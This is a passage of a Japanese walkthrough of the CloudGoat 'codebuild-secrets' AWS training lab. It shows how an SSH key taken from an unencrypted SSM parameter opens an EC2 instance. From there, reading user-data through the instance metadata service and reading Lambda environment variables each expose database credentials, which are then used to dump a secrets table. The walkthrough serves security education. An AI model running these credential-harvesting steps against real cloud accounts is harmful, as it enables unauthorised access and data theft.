        "ARN": "arn:aws:ssm:us-east-1:746321857124:parameter/cg-ec2-private-key-cgidysjfe61q7i",
        "DataType": "text"
    }
}

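上記の鍵をファイルに保存し(JSON出力では改行が文字列の\nとして入っているため、実際の改行に戻してから保存する点に注意)、EC2インスタンスに接続を試みる。
ログインユーザは、Nameタグ(cg-ubuntu-ec2-…)のヒントからubuntuで試す。
なお、この秘密鍵はTypeがStringのパラメータ、つまりSecureStringによる暗号化なしで保存されている。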

% aws ec2 describe-instances --profile Solo --region us-east-1
{
    "Reservations": [
        {
            "Groups": [],
            "Instances": [
                {
                    "AmiLaunchIndex": 0,
                    "ImageId": "ami-0a313d6098716f372",
                    "InstanceId": "i-0b226fe5e8d976a20",
                    "InstanceType": "t2.micro",
                    "KeyName": "cg-ec2-key-pair-cgidysjfe61q7i",
                    "LaunchTime": "2021-01-07T04:45:30+00:00",
                    "Monitoring": {
                        "State": "disabled"
                    },
                    "Placement": {
                        "AvailabilityZone": "us-east-1a",
                        "GroupName": "",
                        "Tenancy": "default"
                    },
                    "PrivateDnsName": "ip-10-10-10-218.ec2.internal",
                    "PrivateIpAddress": "10.10.10.218",
                    "ProductCodes": [],
                    "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
                    "PublicIpAddress": "**.**.**.**",
                    "State": {
                        "Code": 16,
                        "Name": "running"
                    },
                    "StateTransitionReason": "",
                    "SubnetId": "subnet-04e2754b6ac56dabe",
                    "VpcId": "vpc-0d54cc644cc046bf5",
                    "Architecture": "x86_64",
                    "BlockDeviceMappings": [
                        {
                            "DeviceName": "/dev/sda1",
                            "Ebs": {
                                "AttachTime": "2021-01-07T04:45:31+00:00",
                                "DeleteOnTermination": true,
                                "Status": "attached",
                                "VolumeId": "vol-0db7760111a6a1c8e"
                            }
                        }
                    ],
                    "ClientToken": "011C34A0-6099-4720-82D5-21E17C6D06CC",
                    "EbsOptimized": false,
                    "EnaSupport": true,
                    "Hypervisor": "xen",
                    "IamInstanceProfile": {
                        "Arn": "arn:aws:iam::7***********:instance-profile/cg-ec2-instance-profile-cgidysjfe61q7i",
                        "Id": "AIPA23RB7ZJSAHNQLBENQ"
                    },
                    "NetworkInterfaces": [
                        {
                            "Association": {
                                "IpOwnerId": "amazon",
                                "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
                                "PublicIp": "**.**.**.**"
                            },
                            "Attachment": {
                                "AttachTime": "2021-01-07T04:45:30+00:00",
                                "AttachmentId": "eni-attach-0218ccaedbc85605b",
                                "DeleteOnTermination": true,
                                "DeviceIndex": 0,
                                "Status": "attached"
                            },
                            "Description": "",
                            "Groups": [
                                {
                                    "GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
                                    "GroupId": "sg-07844914cbfefc7ce"
                                }
                            ],
                            "Ipv6Addresses": [],
                            "MacAddress": "02:bc:8d:6e:79:37",
                            "NetworkInterfaceId": "eni-0628f8cf600a5fdba",
                            "OwnerId": "7***********",
                            "PrivateDnsName": "ip-10-10-10-218.ec2.internal",
                            "PrivateIpAddress": "10.10.10.218",
                            "PrivateIpAddresses": [
                                {
                                    "Association": {
                                        "IpOwnerId": "amazon",
                                        "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com",
                                        "PublicIp": "**.**.**.**"
                                    },
                                    "Primary": true,
                                    "PrivateDnsName": "ip-10-10-10-218.ec2.internal",
                                    "PrivateIpAddress": "10.10.10.218"
                                }
                            ],
                            "SourceDestCheck": true,
                            "Status": "in-use",
                            "SubnetId": "subnet-04e2754b6ac56dabe",
                            "VpcId": "vpc-0d54cc644cc046bf5",
                            "InterfaceType": "interface"
                        }
                    ],
                    "RootDeviceName": "/dev/sda1",
                    "RootDeviceType": "ebs",
                    "SecurityGroups": [
                        {
                            "GroupName": "cg-ec2-ssh-cgidysjfe61q7i",
                            "GroupId": "sg-07844914cbfefc7ce"
                        }
                    ],
                    "SourceDestCheck": true,
                    "Tags": [
                        {
                            "Key": "Stack",
                            "Value": "CloudGoat"
                        },
                        {
                            "Key": "Scenario",
                            "Value": "codebuild-secrets"
                        },
                        {
                            "Key": "Name",
                            "Value": "cg-ubuntu-ec2-cgidysjfe61q7i"
                        }
                    ],
                    "VirtualizationType": "hvm",
                    "CpuOptions": {
                        "CoreCount": 1,
                        "ThreadsPerCore": 1
                    },
                    "CapacityReservationSpecification": {
                        "CapacityReservationPreference": "open"
                    },
                    "HibernationOptions": {
                        "Configured": false
                    },
                    "MetadataOptions": {
                        "State": "applied",
                        "HttpTokens": "optional",
                        "HttpPutResponseHopLimit": 1,
                        "HttpEndpoint": "enabled"
                    }
                }
            ],
            "OwnerId": "7***********",
            "ReservationId": "r-0e22e3417125b3155"
        }
    ]
}
% ssh -i private ubuntu@ec2-3-80-10-254.compute-1.amazonaws.com     
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan 15 06:57:23 UTC 2021

  System load:  0.0               Processes:           90
  Usage of /:   25.8% of 7.69GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.218
  Swap usage:   0%

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

105 packages can be updated.
2 updates are security updates.


*** System restart required ***

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@ip-10-10-10-218:~$ 

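メタデータサービスから起動時に実行されるスクリプト(user-data)を確認すると、DBの接続情報が得られる。user-dataは基本的にインスタンス上のどのプロセスからでも読めるため、ここにパスワードを書くと、インスタンスに入れたユーザー全員に漏れることになる。なお、以降のログはrootに切り替えた後のもの。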

root@ip-10-10-10-218:~# curl http://169.254.169.254/latest/user-data
#!/bin/bash
apt-get update
apt-get install -y postgresql-client
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "CREATE TABLE sensitive_information (name VARCHAR(100) NOT NULL, value VARCHAR(100) NOT NULL);"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key1','V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4');"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key2','V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6');"

これでDBに接続できるので、後は最初のルートと同じ。

root@ip-10-10-10-218:~# psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (10.15 (Ubuntu 10.15-0ubuntu0.18.04.1), server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.

securedb=> \dt
                List of relations
 Schema |         Name          | Type  |  Owner  
--------+-----------------------+-------+---------
 public | sensitive_information | table | cgadmin
(1 row)

securedb=> select * from sensitive_information;
 name |                   value                    
------+--------------------------------------------
 Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)


または、Lambdaの環境変数としてDBの接続情報が登録されているので、これを窃取すればよい。インスタンス上のAWS CLIは、--profileを指定しなくても、インスタンスプロファイルに紐づくロールの認証情報をメタデータサービス経由で自動的に使う。

root@ip-10-10-10-218:~# apt-get update
(snip)
root@ip-10-10-10-218:~# apt-get install awscli
root@ip-10-10-10-218:~# aws lambda list-functions --region us-east-1
{
    "Functions": [
        {
            "FunctionName": "cg-lambda-cgidysjfe61q7i",
            "FunctionArn": "arn:aws:lambda:us-east-1:746321857124:function:cg-lambda-cgidysjfe61q7i",
            "Runtime": "python3.6",
            "Role": "arn:aws:iam::7***********:role/cg-lambda-role-cgidysjfe61q7i-service-role",
            "Handler": "lambda.handler",
            "CodeSize": 163,
            "Description": "",
            "Timeout": 3,
            "MemorySize": 128,
            "LastModified": "2021-01-07T04:41:44.299+0000",
            "CodeSha256": "N3l99W/S7z8yvEwY1TLdVgLMk1WC3S1hjokcuc9bKGg=",
            "Version": "$LATEST",
            "Environment": {
                "Variables": {
                    "DB_USER": "cgadmin",
                    "DB_NAME": "securedb",
                    "DB_PASSWORD": "wagrrrrwwgahhhhwwwrrggawwwwwwrr"
                }
            },
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "9306902f-8135-4330-81b2-a1de21321546"
        }
    ]
}


ecs_efs_attack


現時点で動作していないようなので、動作するようになったらやる。